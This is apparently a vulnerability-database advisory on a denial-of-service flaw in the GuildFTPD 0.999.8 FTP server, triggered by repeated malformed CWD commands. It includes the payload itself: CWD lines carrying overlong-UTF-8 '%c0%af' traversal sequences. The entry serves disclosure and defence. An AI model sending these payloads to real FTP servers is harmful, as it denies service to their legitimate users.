GuildFTPD 0.999.8 CWD Command Denial of Service Vulnerability

2014-07-01T00:00:00
ID SSV:76584
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/7951/info

A denial of service condition exists in GuildFTPD that may allow a remote user to deny service to legitimate GuildFTPD users.

The denial of service occurs when the server receives several successive malformed CWD commands from an authenticated client.

CWD ..%c0%af....%c0%af....%c0%af....%c0%af....%c0%af....%c0%af..
CWD
\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..\..%c0%af..CWD /..%c0%af../..%c0%af../